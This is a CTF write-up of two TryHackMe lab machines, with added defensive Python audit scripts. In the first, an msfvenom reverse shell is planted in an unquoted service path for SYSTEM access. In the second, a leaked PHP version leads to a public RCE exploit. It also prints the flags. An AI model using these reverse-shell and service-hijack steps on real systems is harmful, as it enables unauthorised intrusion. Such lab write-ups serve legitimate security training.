TryHackMe Challenges

Some vulnerable machines on TryHackMe

Written by: Jan Fok

Quotient

Category: Windows, Privilege Escalation

Vulnerability: Unquoted Service Path

We are provided credentials for the user “Sage” to access a remote machine. We were told to use Remote Desktop Protocol (RDP) to connect to the remote machine. I used xfreerdp and the following command to accomplish this:

xfreerdp /u:sage /p:'[password]' /v:[machine ip]

Enumeration

Using the command systeminfo, we can obtain information about the system.

Using the net command, we can check the group memberships and account information of the user “Sage”. We can also use whoami /priv to check the privileges of the account.

From the results of these tests, we can conclude that “Sage” is a low-privileged account.

I was lost as to what to do, so I read a couple of writeups online and learned that, judging from the name and description of the challenge, there may be an Unquoted Service Path vulnerability on the system.

Next, I ran a service check using Windows Management Instrumentation Command-line (WMIC) using the following command:

wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows\\" | findstr /i /v """

The first part of the command returns every service on the system with its binary path and start mode. The two findstr filters then drop services whose binary lives under C:\Windows and services whose path is already wrapped in quotes, leaving only the unquoted candidates.

This indeed returns an unquoted service path with the name “Development Service” at the path C:\Program Files\Development Files\Devservice Files\Service.exe.

Next, I used the following command to query the service configuration (sc qc takes only the service name; it has no state option).

sc qc "Development Service"

From the results of the command, we can see that the service is set to auto-start, meaning it will be automatically started on system boot/reboot.

After reading about how an unquoted service path works, I learned that the system will check for the executable in the following order:

  1. C:\Program.exe
  2. C:\Program Files\Development.exe
  3. C:\Program Files\Development Files\Devservice.exe
  4. C:\Program Files\Development Files\Devservice Files\Service.exe

We just have to see if we have permission to write into any of the folders along the path that contain a space. We can check folder permissions using icacls (Integrity Control Access Control Lists) from the command line with the following commands:

icacls "C:\Program Files\Development Files\Devservice Files"

icacls "C:\Program Files\Development Files"

From the results, we can see that we do have write access to the “Development Files” folder. Now, we can proceed with our exploitation.
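The search order listed above and the icacls check can be turned into a single audit that a defender runs across all services. The script below is an added example and is not code from the writeup or from TryHackMe: it flags services whose binary path contains spaces but no quotes, reproduces the order in which Windows probes for the executable, reports which of those directories a low-privileged user can write to, and prints the quoted binPath that fixes each one. It also handles the general case of an unquoted path followed by arguments, which the writeup's single service does not show. The service rows and the writability result are constructed so it runs offline; on a real host you would feed it the output of wmic service get name,displayname,pathname,startmode and a real permission check such as parsed icacls output.

```python
"""Unquoted service path audit (added example; not code from the write-up).
For each service it flags binaries whose path contains spaces but no quotes,
lists the locations Windows probes before reaching the real executable (the
order the write-up enumerates), and reports which of those directories the
supplied ACL check says an ordinary user can write to. Service rows and the
ACL result are constructed so the script runs offline."""
import ntpath
import re

# Constructed sample rows (name, pathname, startmode). The first mirrors the
# "Development Service" from the write-up; the rest are invented to show a
# quoted path, a C:\Windows path and an unquoted path with arguments.
SAMPLE_SERVICES = [
    ("Development Service",
     r"C:\Program Files\Development Files\Devservice Files\Service.exe", "Auto"),
    ("Vendor Agent", r'"C:\Program Files\Vendor App\agent.exe" -service', "Auto"),
    ("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs -p", "Manual"),
    ("Legacy Updater", r"C:\Tools\Legacy Updater\updater.exe -quiet", "Disabled"),
]

# Constructed stand-in for an icacls check: only "Development Files" grants
# write access to ordinary users, as the write-up found.
CONSTRUCTED_WRITABLE = {r"C:\Program Files\Development Files"}

_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def executable_from_pathname(pathname):
    """Return (exe_path, quoted). A leading quote makes the path safe from this
    bug; otherwise the executable is taken up to the first '.exe' token."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return pathname[1:pathname.find('"', 1)], True
    m = _EXE_RE.match(pathname)
    return (m.group(1) if m else pathname.split(" ")[0]), False


def probe_order(exe_path):
    """Reproduce the CreateProcess search for an unquoted path: every space is
    a possible end of the file name, '.exe' is appended when the fragment has
    no extension, and the last entry is the intended binary."""
    parts = exe_path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    candidates.append(exe_path)
    return candidates


def hijack_directories(candidates):
    """Directories a planted file would have to live in; the real binary's own
    directory is excluded because that entry is the legitimate one."""
    return sorted({ntpath.dirname(c) for c in candidates[:-1]})


def fixed_binpath(pathname, exe):
    """Remediation value for `sc config <service> binPath=`: quote the
    executable and keep any arguments as they were."""
    return '"%s"%s' % (exe, pathname.strip()[len(exe):])


def audit(services, is_dir_writable):
    """One finding per vulnerable service. Paths under C:\\Windows are skipped,
    matching the findstr filter used with wmic in the write-up."""
    findings = []
    for name, pathname, startmode in services:
        exe, quoted = executable_from_pathname(pathname)
        if quoted or " " not in exe or exe.lower().startswith("c:\\windows\\"):
            continue
        candidates = probe_order(exe)
        findings.append({
            "service": name,
            "startmode": startmode,
            "probe_order": candidates,
            "writable_dirs": [d for d in hijack_directories(candidates)
                              if is_dir_writable(d)],
            "fixed_binpath": fixed_binpath(pathname, exe),
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES, CONSTRUCTED_WRITABLE.__contains__):
        print(f"[{f['startmode']}] {f['service']}")
        for c in f["probe_order"]:
            print("   probes:", c)
        print("   writable by low-priv users:", f["writable_dirs"] or "none")
        print("   fix: sc config binPath=", f["fixed_binpath"])
```

The is_dir_writable argument is deliberately injected rather than hard-coded: os.access is unreliable against NTFS ACLs, so on a real host you would pass a predicate built from icacls output or from the Get-Acl cmdlet. An Auto start mode in a finding is what makes the Quotient case severe, since the planted file runs as SYSTEM at the next boot without any further action.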

Exploitation

We will use msfvenom to create a reverse shell executable on our local machine using the following command:

msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL IP] LPORT=443 -f exe -o Devservice.exe

Next, we start a web server using python to host the file with the following command:

python3 -m http.server

Then, we can use wget (the PowerShell alias for Invoke-WebRequest) on the remote machine to download the file from our local machine to the target, using the following command (note the port goes after the host, not in the path):

PowerShell

wget http://local.machine.ip:8000/Devservice.exe -OutFile "c:\program files\development files\Devservice.exe"

We once again use icacls to give all users permission to run the executable with the following command (the option is /grant, with a forward slash):

icacls "c:\program files\development files\Devservice.exe" /grant everyone:F

Now, we restart the target machine so that Windows auto-runs the reverse shell executable on boot. When the machine came back up, I obtained a reverse shell on my local machine with SYSTEM privileges and was able to obtain the flag from the Administrator's desktop.

Flag

THM{USPE_SUCCESS}


Agent T

Category: WebApp, Privilege Escalation

Enumeration

When accessing the provided website with a web browser, I notice that there's nothing special in the actual HTML elements. However, when I inspect the HTTP request and response headers, I note that the PHP version was leaked: PHP 8.1.0.

Googling vulnerabilities for that version of PHP, I found a vulnerability, and a script exploiting it for remote code execution (RCE), readily available on ExploitDB.
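The observation that led to the foothold is a version string in a response header. As an added example that is not part of the writeup, the following script does the same inspection in a repeatable way: it parses a raw HTTP response, flags the headers that commonly carry product and version strings, and names the setting that suppresses each one. The response is constructed; only the PHP version comes from the writeup.

```python
"""Header-disclosure check (added example, not part of the original write-up).
Parses a raw HTTP response and flags headers that reveal server or language
versions, the same observation the write-up makes from the browser's network
inspector. The response below is constructed; only the PHP version string is
taken from the write-up."""
import re

# Constructed raw response, modelled on what a PHP-backed site returns when
# expose_php is left on.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache/2.4.51 (Debian)\r\n"
    "X-Powered-By: PHP/8.1.0\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body>Hello</body></html>"
)

# Headers that commonly carry product/version strings, with the setting that
# silences each one.
DISCLOSING_HEADERS = {
    "x-powered-by": "php.ini: expose_php = Off (and strip the header at the proxy)",
    "server": "Apache: ServerTokens Prod / nginx: server_tokens off",
    "x-aspnet-version": 'web.config: <httpRuntime enableVersionHeader="false" />',
}

# Matches "Product/1.2.3" style tokens, keeping suffixes such as "-dev".
_VERSION_RE = re.compile(r"([A-Za-z][\w.-]*)/(\d+(?:\.\d+)+[\w-]*)")


def parse_headers(raw):
    """Split a raw response into (status_line, {lower_name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def find_version_disclosures(raw):
    """Return a list of (header, product, version, remediation) tuples for
    every version string found in a disclosing header."""
    _, headers = parse_headers(raw)
    findings = []
    for name, fix in DISCLOSING_HEADERS.items():
        value = headers.get(name)
        if not value:
            continue
        for product, version in _VERSION_RE.findall(value):
            findings.append((name, product, version, fix))
    return findings


if __name__ == "__main__":
    for header, product, version, fix in find_version_disclosures(SAMPLE_RESPONSE):
        print(f"{header}: {product} {version}  ->  {fix}")
```

Run against live traffic, the same function can be fed the header block captured by a proxy or by the browser's developer tools; a clean result means the version lookup that the writeup relied on is no longer possible from headers alone.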

Downloading the Python script and running it, I managed to obtain a root shell on the server and obtained the flag in the root directory.

Flag

8flag{4127d0530abf16d6d23973e3df8dbecb}